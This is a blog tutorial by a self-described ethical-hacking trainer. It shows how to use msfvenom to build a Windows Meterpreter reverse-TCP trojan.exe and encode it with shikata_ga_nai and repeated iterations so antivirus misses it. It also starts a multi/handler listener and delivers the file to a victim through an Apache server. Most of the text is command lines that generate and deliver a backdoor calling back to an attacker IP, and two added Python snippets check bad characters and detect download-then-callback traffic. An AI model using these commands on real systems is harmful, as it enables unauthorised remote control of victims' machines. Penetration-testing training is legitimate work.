MSFvenom replacement of MSFpayload and msfencode – Full guide


Hello and welcome to my blog. In this post I bring you a new and useful guide. As you know, msfpayload was used to create payloads (generally called trojans or backdoors) and msfencode was used to encode those payloads to avoid antivirus detection. You can read about them in my old post Creating Trojan Horse (Encoded) By Using Msfpayload, but both msfpayload and msfencode were removed from the Metasploit Framework on June 8th, 2015.

So what replaces them now?

The answer is msfvenom.


In this article I will cover what msfvenom is, how it is used, how to generate and encode a payload with msfvenom, how to avoid bad characters with msfvenom, and how to start a multi/handler listener that waits for the trojan/backdoor to connect back.

What is msfvenom?

In simple words, “msfvenom is a combination of msfpayload and msfencode. It is used to generate payloads and to encode them as well.” You no longer need to run two different commands to create a payload and then encode it. msfvenom ships with Metasploit by default, so you don’t need to install any extra package on your system. For more detail about Metasploit see https://www.metasploit.com/, and for tutorials read the Metasploit guide section of this blog.

The Metasploit command line interface msfconsole and the GUI Armitage are preinstalled in the current version of Kali Linux, Kali 2016.2. I will describe the tutorial using Kali Linux.

Let’s start using MSFvenom

In Kali Linux, right click on the desktop, then click on Open Terminal. A new terminal window will open; type the following command:


#msfvenom -h

[Screenshot: msfvenom help output]

How to generate a payload using MSFvenom

To generate a payload, two switches must be used: -p and -f. -p selects the payload and -f selects the output file format. You should first know which payload you are going to use. To print the list of available payloads, use -l:

#msfvenom -l payloads

After selecting an appropriate payload, use the following command:

#msfvenom -p <payload> -f <file format>

To know more about the available formats, use the following command:

#msfvenom --help-formats

[Screenshot: file formats supported by msfvenom]

#msfvenom -p windows/meterpreter/reverse_tcp -f exe > PATH

The command would then be:

#msfvenom -p windows/meterpreter/reverse_tcp -f exe > /root/Desktop/trojan.exe

Before executing this command you should know about the payload options that must be set. The payload in the command above is meant to send a connection back to the attacker, but as written it will not, because its options have not been specified yet. So you must know which options are available for windows/meterpreter/reverse_tcp. Run the following command:

#msfvenom --payload-options -p <payload>

[Screenshot: payload options in msfvenom]

Now the command is:

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=[desired port] -f exe > /root/Desktop/trojan.exe

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=4444 -f exe > /root/Desktop/trojan.exe

The good news is that your payload is ready: you can send this file to the victim machine, and when the victim executes it, the machine is compromised. But this payload is well known and most antivirus products have signatures for it, so they will easily detect the file and remove it. So what is next?

You can do the following things:

  1. Avoid bad characters
  2. Encode the payload
  3. Use iterations

How to avoid bad characters in the payload by using msfvenom

As you have seen in the help menu of msfvenom, the -b flag is used to keep certain bad characters (for example the null byte) out of the payload. When the -b switch is used, msfvenom picks a suitable encoder on its own and encodes the payload so that the listed bytes do not appear in it:

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -b '\x00' -f exe > /root/Desktop/trojan.exe
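The check behind the -b switch, written out as an added example (this is not msfvenom code and does not encode anything): it parses a bad-character spec in the same '\x00\x0a' form the switch accepts and reports every offset in a raw blob where a forbidden byte occurs, which is how you verify a blob before and after an encoder such as the one the -e section below selects. The sample blob is constructed for the example.

```python
"""Verify a raw payload blob against an msfvenom-style bad-character list.

Added example for this guide, not part of msfvenom. It reproduces the
check behind the -b switch: parse a spec like '\\x00\\x0a\\x0d' and report
every offset at which a forbidden byte occurs, so a blob can be checked
before and after encoding.
"""
import re
from typing import Dict, List

_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_badchars(spec: str) -> bytes:
    """Turn the -b argument ('\\x00\\x0a') into the sorted set of forbidden bytes.

    Characters outside \\xNN escapes are taken literally, as on the command line.
    """
    out = bytearray()
    pos = 0
    for m in _ESCAPE.finditer(spec):
        out += spec[pos:m.start()].encode("latin-1")
        out.append(int(m.group(1), 16))
        pos = m.end()
    out += spec[pos:].encode("latin-1")
    return bytes(sorted(set(out)))


def find_badchars(blob: bytes, bad: bytes) -> Dict[int, List[int]]:
    """Map each forbidden byte value to the offsets where it appears in blob."""
    hits: Dict[int, List[int]] = {}
    for off, b in enumerate(blob):
        if b in bad:
            hits.setdefault(b, []).append(off)
    return hits


def is_clean(blob: bytes, spec: str) -> bool:
    """True when the blob contains none of the -b bytes (what an encoder must achieve)."""
    return not find_badchars(blob, parse_badchars(spec))


# Constructed sample blob: a few x86 NOPs followed by bytes that include
# 0x00 and 0x0a, which a spec of '\x00\x0a\x0d' must flag.
SAMPLE_BLOB = b"\x90\x90\x90\x31\xc0\x50\x0a\xb8\x00\x01"

if __name__ == "__main__":
    hits = find_badchars(SAMPLE_BLOB, parse_badchars(r"\x00\x0a\x0d"))
    for value, offsets in sorted(hits.items()):
        print(f"bad byte 0x{value:02x} at offsets {offsets}")
```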


How to encode a payload by msfvenom

When you use the -b flag, the payload is encoded automatically with a suitable encoder. If you still want to use a specific encoder, you can pass -e [encoder name]. Only the encoders shipped with msfvenom can be used, so first run the following command to list the available encoders:

#msfvenom -l encoders

[Screenshot: list of encoders in msfvenom]

Your final command will be:

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -f exe > /root/Desktop/trojan.exe

Iterations:

The -i switch sets the number of times the payload is passed through the encoder:

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > /root/Desktop/trojan.exe

Use architecture and platform for a payload in msfvenom

-a <x86/x64> defines the architecture and --platform defines the platform. First check which platforms are available in Metasploit:

#msfvenom --help-platforms

[Screenshot: platforms supported by msfvenom]

#msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > /root/Desktop/trojan.exe


Start the multi/handler listener on the attacker machine

When the trojan is executed on the victim’s machine it sends a connection back to the attacker machine, so the attacker must have a listener running there. You can start the multi/handler listener on your attacker machine with the following instructions:

#msfconsole

msf > use exploit/multi/handler

msf > set payload windows/meterpreter/reverse_tcp

msf > set LHOST 192.168.56.100   (attacker IP)

msf > set LPORT 4444

msf > exploit

[Screenshot: multi/handler listener started on the attacker machine]

This is a very important phase. You have created trojan.exe and started the multi/handler listener; the next step is to send the file to the victim machine. I started the apache2 web server and moved trojan.exe to /var/www/html, and I forwarded port 80 to my attacker machine on the router. Then I sent the link http://AttackerIP/trojan.exe. The victim downloads the trojan and executes it, and the session is created.

[Screenshot: Meterpreter session opened]
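From the defender's side, the delivery flow just described has a distinctive shape: a client fetches an .exe over HTTP from an IP, then shortly afterwards opens a TCP connection to that same IP on a non-web port (the LHOST/LPORT the handler listens on). The added detection below, written for this guide and not part of Metasploit, correlates the two in a simplified, constructed proxy/firewall log format; the field order and log lines are assumptions.

```python
"""Correlate an .exe download with a follow-on callback to the same host.

Added detection example for the delivery flow this guide describes
(http://AttackerIP/trojan.exe, then a reverse_tcp connection to LHOST:LPORT).
Not part of Metasploit. The log format is a constructed, simplified
proxy/firewall export: "ts,client,dest_ip,dest_port,proto,detail".
"""
from collections import defaultdict
from typing import List, Tuple

WEB_PORTS = {80, 443, 8080}
WINDOW_SECS = 300  # callback must follow the download within five minutes


def parse(line: str) -> Tuple[int, str, str, int, str, str]:
    ts, client, dst, port, proto, detail = line.strip().split(",", 5)
    return int(ts), client, dst, int(port), proto, detail


def suspicious_callbacks(lines: List[str]) -> List[Tuple[str, str, int]]:
    """Return (client, dest_ip, port) for every non-web outbound connection a
    client makes to the same IP it fetched an .exe from shortly before."""
    downloads = defaultdict(list)  # (client, dst) -> timestamps of .exe fetches
    hits = []
    for ts, client, dst, port, proto, detail in sorted(map(parse, lines)):
        if proto == "http" and detail.lower().endswith(".exe"):
            downloads[(client, dst)].append(ts)
        elif proto == "tcp" and port not in WEB_PORTS:
            if any(0 <= ts - t0 <= WINDOW_SECS for t0 in downloads[(client, dst)]):
                hits.append((client, dst, port))
    return hits


# Constructed sample: 10.0.0.5 downloads trojan.exe from 192.168.56.100 over
# HTTP and then opens TCP 4444 to the same host; 10.0.0.7 is benign traffic.
SAMPLE_LOG = [
    "1000,10.0.0.5,192.168.56.100,80,http,GET /trojan.exe",
    "1003,10.0.0.5,192.168.56.100,4444,tcp,SYN",
    "1010,10.0.0.7,203.0.113.10,443,tcp,SYN",
    "1020,10.0.0.7,192.168.56.100,80,http,GET /index.html",
    "1025,10.0.0.7,192.168.56.100,4444,tcp,SYN",
]

if __name__ == "__main__":
    for client, dst, port in suspicious_callbacks(SAMPLE_LOG):
        print(f"{client} fetched an .exe from {dst} then connected to {dst}:{port}")
```

Port 4444 alone is a weak signal since LPORT is freely chosen; the pairing of the download host with the callback host is what makes the alert worth raising.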


Vijay Kumar

Ethical Hacking & Penetration Testing Trainer
